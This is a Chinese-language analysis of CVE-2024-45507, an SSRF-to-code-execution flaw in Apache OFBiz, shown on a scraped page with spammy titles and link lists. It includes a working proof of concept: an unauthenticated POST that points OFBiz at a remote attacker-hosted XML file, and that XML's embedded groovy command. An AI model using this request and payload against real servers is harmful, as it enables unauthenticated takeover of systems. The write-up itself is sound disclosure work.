当前位置: 首页 > news >正文

使用iis6搭建网站品牌网站建设方案

使用iis6搭建网站,品牌网站建设方案,网站安全维护怎么做,wordpress建站博客园Apache OFBiz介绍 Apache OFBiz 是一个功能丰富的开源电子商务平台,包含完整的商业解决方案,适用于多种行业。它提供了一套全面的服务,包括客户关系管理(CRM)、企业资源规划(ERP)、订单管理、产…

Apache OFBiz介绍

Apache OFBiz 是一个功能丰富的开源电子商务平台,包含完整的商业解决方案,适用于多种行业。它提供了一套全面的服务,包括客户关系管理(CRM)、企业资源规划(ERP)、订单管理、产品目录、在线交易等。OFBiz提供了强大的 Java Web 框架、成熟的 CRM 和 ERP 功能,Apache OFBiz 的架构设计考虑了开发人员的便利性,它的灵活性和模块化设计使得它能够适应各种业务需求,无论是小型企业还是大型企业。Apache OFBiz 已经发展了超过10年,作为一个企业范围内的 ERP 解决方案,它已经显示出其稳定性和成熟性,通过使用 Apache OFBiz,企业可以实现高效的业务流程自动化,提高运营效率,降低成本。

漏洞背景

  近期,Apache Ofbiz团队发布了一则安全通知,宣布修补了一个存在于Apache Ofbiz软件中的严重安全漏洞,该漏洞被分配为CVE-2024-45507。由于Apache OFBiz在从Groovy加载文件时未对用户提交的数据进行过滤,未经身份验证的恶意攻击者通过服务器端请求伪造的方式向任意系统发起请求,加载远程恶意xml执行任意代码,从而获取目标服务器的控制权限,具体来说,攻击者可以构造一个恶意的 XML 文件,并通过 SSRF 攻击让 Apache OFBiz 的服务器加载并执行这个文件中的 Groovy 脚本。

漏洞分析

查看官方的修复代码如下:

https://github.com/apache/ofbiz-framework/commit/ffb1bc487983fa672ac4fbeccf7ed7175e2accd3

之前默认能接收远程文件来渲染screen。

比如该screen,screen 文件是 OFBiz 的一部分,用于定义屏幕布局。这段代码定义了一个名为 StatsSinceStart 的屏幕,用于展示统计信息。

在XML配置文件中,定义了一个名为`的标签,其 name`属性设置为 "StatsDecorator",而location属性则通过 ${parameters.statsDecoratorLocation} 动态获取。当Ofbiz解析这个XML文件时,它会根据指定的参数再次渲染该段代码。

之后再调用this.getLocation方法解析传入模板中的parameters参数。

在此场景中,可以通过URL传递一个参数来动态指定标签的 location 属性的值。getScreenFromLocation 方法中,会根据URL传递的参数来获取配置信息,并将其作为模板进行解析处理。

POC为:

POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: server:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://vps /poc.xml

接收的URL将被视作一个模型屏幕(modelScreen)并进行解析,参照可以根据代码中的示例来构建一个概念验证包含命令的XML文件。

参考其语法,包含可执行命令的远程XMl文件构造如下:

<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd"><screen name="StatsDecorator"><section><actions><set value="${groovy:'touch /tmp/poc.execute();}"/></actions></section></screen>
</screens>

向ofbiz发送该POC请求。

之后查看服务器目录,成功执行了命令。

作者:罗晟

2024年9月27日

洞源实验室

http://www.yayakq.cn/news/212563/

相关文章:

  • 一个空间安装多个织梦网站系统婚纱摄影网站源码下载
  • 网站建设与管理自考试题及答案青岛网站建设方案
  • 正能量网站推荐免费下载wordpress访问统计插件
  • 产品网站建设设计方案北京互联网公司网站建设
  • 做网站 注意交易网站建设计划书
  • 网站优化的意义公章电子版在线制作
  • 做一个手机网站多少钱手机网站设计尺寸大小
  • 个人网站网页底部模板jsp网站开发详细教程
  • 山东青岛网站建设公司哪家专业广州做网站的公司哪家好
  • 网站地图建设有什么用网页设计需要什么专业
  • 苏州做网站好的成都最专业做网站的
  • 网站标题改动百度k了网站怎么办
  • 做源码网站违法吗单页营销式网站模板下载
  • 山西p2p网站建设wordpress迁移器
  • 东莞58同城做网站电话注册网站域名多少钱一年
  • 西安网站推广公司电话银川森林半岛
  • 佛山微网站建设天博徐州设计公司有哪些
  • 视频网站点击链接怎么做的上海人才网最新招聘信息
  • 手机网站的优势郑州网站关键词优化公司哪家好
  • 南宁网站建设培训学校ps怎么设计网页
  • 网站营销建设专业3合1网站建设价格
  • 深圳做网站乐云seo598在线传媒有限公司
  • 贵州省住房和城乡建设厅官网站首页万网一个ip建立多个网站
  • 阿里云虚拟主机多个网站集团网页建设
  • 南京做企业号微网站营销宿州注册公司多少钱
  • 房地产网站怎么推广微信24小时人工申诉
  • 龙岗网络营销网站制作哪里好各大网站网址是多少
  • 中国建设银行网站太慢了北京制作网站报价
  • 南昌网站建设利润免费全自动网页制作系统
  • 建设装修网站交互式网站开发